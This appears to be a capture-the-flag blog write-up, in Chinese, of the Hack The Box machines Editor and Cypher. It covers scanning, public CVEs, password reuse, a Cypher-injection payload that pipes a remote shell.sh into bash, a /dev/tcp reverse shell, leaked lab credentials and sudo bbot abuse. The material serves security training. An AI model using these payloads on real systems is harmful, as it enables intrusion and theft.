Editor#

外网打点#

rustscan不知道为什么扫不出来8080，感觉被资本做局了

1
nmap -sC -sV -Pn -p- 10.10.11.80 --min-rate=5000
2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-05 13:06 CST
3
Nmap scan report for 10.10.11.80
4
Host is up (0.11s latency).
5
Not shown: 52865 filtered tcp ports (no-response), 12667 closed tcp ports (conn-refused)
6
PORT     STATE SERVICE VERSION
7
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
8
| ssh-hostkey:
9
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
10
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
11
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
12
|_http-title: Did not follow redirect to http://editor.htb/
13
|_http-server-header: nginx/1.18.0 (Ubuntu)
14
8080/tcp open  http    Jetty 10.0.20
15
| http-cookie-flags:
16
|   /:
17
|     JSESSIONID:
18
|_      httponly flag not set
19
| http-title: XWiki - Main - Intro
20
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
21
| http-robots.txt: 50 disallowed entries (15 shown)
22
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
23
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
24
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
25
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
26
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
27
|_/xwiki/bin/undelete/
28
| http-webdav-scan:
29
|   WebDAV type: Unknown
30
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
31
|_  Server Type: Jetty(10.0.20)
32
|_http-server-header: Jetty(10.0.20)
33
| http-methods:
34
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
35
|_http-open-proxy: Proxy might be redirecting requests
36
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
37

38
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
39
Nmap done: 1 IP address (1 host up) scanned in 106.22 seconds

先把域名加进去，然后访问80发现什么都没有bro，看看8080，发现了xwiki这个词直接在网上搜一下，找到CVE

内网#

切换用户#

进去之后看见了一堆数据库文件，且本地有mysql，第一想法是找到数据库密码，数据库里面估计有其他的账号信息

尝试之后无果，只得到了一个可以登陆数据库的密码theEd1t0rTeam99

然后突发奇想bro，cat /etc/passwd看见了一堆用户，直接一个一个试，当然了hydra可以快速喷洒，这里可以用oliver这个用户登陆上去

提权#

进去之后id看看，结果发现netdata，网上搜一下cve，找到cve了xd，直接打就行了，非常的简单

值得注意的是，靶机是x86的，我mac的arm直接废掉了，我哭死

Cypher#

外网打点#

1
nmap  -sC -sV -Pn 10.10.11.57                                                                                                                  ─╯
2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 10:52 CST
3
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
4
SYN Stealth Scan Timing: About 99.99% done; ETC: 10:53 (0:00:00 remaining)
5
Stats: 0:01:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
6
SYN Stealth Scan Timing: About 99.99% done; ETC: 10:54 (0:00:00 remaining)
7
Nmap scan report for 10.10.11.57
8
Host is up (0.11s latency).
9
Not shown: 998 closed tcp ports (reset)
10
PORT   STATE SERVICE VERSION
11
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
12
| ssh-hostkey:
13
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
14
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
15
80/tcp open  http    nginx 1.24.0 (Ubuntu)
16
|_http-server-header: nginx/1.24.0 (Ubuntu)
17
|_http-title: Did not follow redirect to http://cypher.htb/
18
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
19

20
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
21
Nmap done: 1 IP address (1 host up) scanned in 90.02 seconds
22

23
dirsearch -u http://cypher.htb/                                                                  ─╯
24
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
25
  from pkg_resources import DistributionNotFound, VersionConflict
26

27
  _|. _ _  _  _  _ _|_    v0.4.3
28
 (_||| _) (/_(_|| (_| )
29

30
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
31

32
Output File: /home/zsm/reports/http_cypher.htb/__25-03-30_10-57-11.txt
33

34
Target: http://cypher.htb/
35
[10:57:11] Starting:
36
[10:57:23] 200 -    5KB - /about
37
[10:57:23] 200 -    5KB - /about.html
38
[10:57:31] 404 -   22B  - /api.log
39
[10:57:31] 404 -   22B  - /api-docs
40
[10:57:31] 307 -    0B  - /api/  ->  http://cypher.htb/api/api
41
[10:57:31] 404 -   22B  - /api/2/explore/
42
[10:57:31] 307 -    0B  - /api  ->  /api/docs
43
[10:57:31] 404 -   22B  - /api-doc
44
[10:57:31] 404 -   22B  - /api.py
45
[10:57:31] 404 -   22B  - /api/batch
46
[10:57:31] 404 -   22B  - /api.php
47
[10:57:31] 404 -   22B  - /api/__swagger__/
48
[10:57:31] 404 -   22B  - /api/2/issue/createmeta
49
[10:57:31] 404 -   22B  - /api/cask/graphql
50
[10:57:31] 404 -   22B  - /api/_swagger_/
51
[10:57:31] 404 -   22B  - /api/api
52
[10:57:31] 404 -   22B  - /api/api-docs
53
[10:57:32] 404 -   22B  - /api/apidocs/swagger.json
54
[10:57:32] 404 -   22B  - /api/docs
55
[10:57:32] 404 -   22B  - /api/application.wadl
56
[10:57:32] 404 -   22B  - /api/apidocs
57
[10:57:32] 404 -   22B  - /api/docs/
58
[10:57:32] 404 -   22B  - /api/config
59
[10:57:32] 404 -   22B  - /api/jsonws
60
[10:57:32] 404 -   22B  - /api/snapshots
61
[10:57:32] 404 -   22B  - /api/profile
62
[10:57:32] 404 -   22B  - /api/error_log
63
[10:57:32] 404 -   22B  - /api/swagger
64
[10:57:32] 404 -   22B  - /api/login.json
65
[10:57:32] 404 -   22B  - /api/jsonws/invoke
66
[10:57:32] 404 -   22B  - /api/proxy
67
[10:57:32] 404 -   22B  - /api/package_search/v4/documentation
68
[10:57:32] 404 -   22B  - /api/spec/swagger.json
69
[10:57:32] 404 -   22B  - /api/swagger.yaml
70
[10:57:32] 404 -   22B  - /api/swagger.json
71
[10:57:32] 404 -   22B  - /api/swagger/ui/index
72
[10:57:32] 404 -   22B  - /api/v1/swagger.json
73
[10:57:32] 404 -   22B  - /api/swagger/swagger
74
[10:57:32] 404 -   22B  - /api/swagger.yml
75
[10:57:32] 404 -   22B  - /api/v1/
76
[10:57:32] 404 -   22B  - /api/timelion/run
77
[10:57:32] 404 -   22B  - /api/v1
78
[10:57:32] 404 -   22B  - /api/v2
79
[10:57:32] 404 -   22B  - /api/v1/swagger.yaml
80
[10:57:32] 404 -   22B  - /api/v2/
81
[10:57:32] 404 -   22B  - /api/v2/swagger.json
82
[10:57:32] 404 -   22B  - /api/v2/helpdesk/discover
83
[10:57:32] 404 -   22B  - /api/v2/swagger.yaml
84
[10:57:32] 404 -   22B  - /api/whoami
85
[10:57:32] 404 -   22B  - /apibuild.pyc
86
[10:57:32] 404 -   22B  - /api/v3
87
[10:57:32] 404 -   22B  - /apidoc
88
[10:57:32] 404 -   22B  - /api/v4
89
[10:57:32] 404 -   22B  - /apiserver-key.pem
90
[10:57:32] 404 -   22B  - /api/vendor/phpunit/phpunit/phpunit
91
[10:57:32] 404 -   22B  - /apiserver-client.crt
92
[10:57:32] 404 -   22B  - /apiserver-aggregator-ca.cert
93
[10:57:32] 404 -   22B  - /apiserver-aggregator.cert
94
[10:57:32] 404 -   22B  - /apis
95
[10:57:32] 404 -   22B  - /apidocs
96
[10:57:32] 404 -   22B  - /api/version
97
[10:57:32] 404 -   22B  - /apiserver-aggregator.key
98
[10:57:41] 307 -    0B  - /demo  ->  /login
99
[10:57:41] 404 -   22B  - /demo.php
100
[10:57:41] 404 -   22B  - /demo.aspx
101
[10:57:42] 307 -    0B  - /demo/  ->  http://cypher.htb/api/demo
102
[10:57:42] 404 -   22B  - /demo.jsp
103
[10:57:42] 404 -   22B  - /demo.js
104
[10:57:42] 404 -   22B  - /demo/sql/index.jsp
105
[10:57:42] 404 -   22B  - /demos/
106
[10:57:42] 404 -   22B  - /demo/ojspext/events/globals.jsa
107
[10:57:42] 404 -   22B  - /demoadmin
108
[10:57:52] 200 -    4KB - /login
109
[10:57:52] 200 -    4KB - /login.html
110
[10:58:08] 301 -  178B  - /testing  ->  http://cypher.htb/testing/

http://cypher.htb/testing/ 下面有个jar包，反编译他 login尝试sql注入，虽然报错，但是无果

1
package com.cypher.neo4j.apoc;
2

3
import java.io.BufferedReader;
4
import java.io.InputStreamReader;
5
import java.util.Arrays;
6
import java.util.concurrent.TimeUnit;
7
import java.util.stream.Stream;
8
import org.neo4j.procedure.Description;
9
import org.neo4j.procedure.Mode;
10
import org.neo4j.procedure.Name;
11
import org.neo4j.procedure.Procedure;
12

13
/* loaded from: custom-apoc-extension-1.0-SNAPSHOT.jar:com/cypher/neo4j/apoc/CustomFunctions.class */
14
public class CustomFunctions {
15
    @Procedure(name = "custom.getUrlStatusCode", mode = Mode.READ)
16
    @Description("Returns the HTTP status code for the given URL as a string")
17
    public Stream<StringOutput> getUrlStatusCode(@Name("url") String url) throws Exception {
18
        if (!url.toLowerCase().startsWith("http://") && !url.toLowerCase().startsWith("https://")) {
19
            url = "https://" + url;
20
        }
21
        String[] command = {"/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};
22
        System.out.println("Command: " + Arrays.toString(command));
23
        Process process = Runtime.getRuntime().exec(command);
24
        BufferedReader inputReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
25
        BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
26
        StringBuilder errorOutput = new StringBuilder();
27
        while (true) {
28
            String line = errorReader.readLine();
29
            if (line == null) {
30
                break;
31
            }
32
            errorOutput.append(line).append("\n");
33
        }
34
        String statusCode = inputReader.readLine();
35
        System.out.println("Status code: " + statusCode);
36
        boolean exited = process.waitFor(10L, TimeUnit.SECONDS);
37
        if (!exited) {
38
            process.destroyForcibly();
39
            statusCode = "0";
40
            System.err.println("Process timed out after 10 seconds");
41
        } else {
42
            int exitCode = process.exitValue();
43
            if (exitCode != 0) {
44
                statusCode = "0";
45
                System.err.println("Process exited with code " + exitCode);
46
            }
47
        }
48
        if (errorOutput.length() > 0) {
49
            System.err.println("Error output:\n" + errorOutput.toString());
50
        }
51
        return Stream.of(new StringOutput(statusCode));
52
    }
53

54
    /* loaded from: custom-apoc-extension-1.0-SNAPSHOT.jar:com/cypher/neo4j/apoc/CustomFunctions$StringOutput.class */
55
    public static class StringOutput {
56
        public String statusCode;
57

58
        public StringOutput(String statusCode) {
59
            this.statusCode = statusCode;
60
        }
61
    }
62
}

1
{
2
  "username": "admin' return h.value AS value  UNION CALL custom.getUrlStatusCode(\"127.0.0.1;curl 10.10.16.4:8000/shell.sh|bash;\") YIELD statusCode AS value  RETURN value ; //",
3
  "password": "123"
4
}
5

6
bash -i >& /dev/tcp/10.10.16.4/4444 0>&1

1
neo4j@cypher:/$ id
2
id
3
uid=110(neo4j) gid=111(neo4j) groups=111(neo4j)
4
neo4j@cypher:/$ cd /home
5
cd /home
6
neo4j@cypher:/home$ ls
7
ls
8
graphasm
9
neo4j@cypher:/home$ cd g
10
cd g
11
bash: cd: g: No such file or directory
12
neo4j@cypher:/home$ cd graphasm
13
cd graphasm
14
neo4j@cypher:/home/graphasm$ ls
15
ls
16
bbot_preset.yml
17
bbot_scans
18
my_modules
19
user.txt
20

21
neo4j@cypher:/home/graphasm$ cat bb*
22
cat bb*
23
targets:
24
  - ecorp.htb
25

26
output_dir: /home/graphasm/bbot_scans
27

28
config:
29
  modules:
30
    neo4j:
31
      username: neo4j
32
      password: cU4btyib.20xtCMCXkBmerhK
33

34
module_dirs:
35
  - /home/graphasm/my_modules

拿到账号密码,ssh上去

内网提权#

1
graphasm@cypher:~$ sudo -l
2
Matching Defaults entries for graphasm on cypher:
3
    env_reset, mail_badpass,
4
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
5

6
User graphasm may run the following commands on cypher:
7
    (ALL) NOPASSWD: /usr/local/bin/bbot
8
graphasm@cypher:~$ cat  /usr/local/bin/bbot
9
#!/opt/pipx/venvs/bbot/bin/python
10
# -*- coding: utf-8 -*-
11
import re
12
import sys
13
from bbot.cli import main
14
if __name__ == '__main__':
15
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
16
    sys.exit(main())

graphasm@cypher:/usr/local/bin$ sudo /usr/local/bin/bbot -cy /root/root.txt —debug 直接增加规则，然后调试，形成读取文件的情况

a ctfer on the load

Editor#

外网打点#

内网#

切换用户#

提权#

Cypher#

外网打点#

内网提权#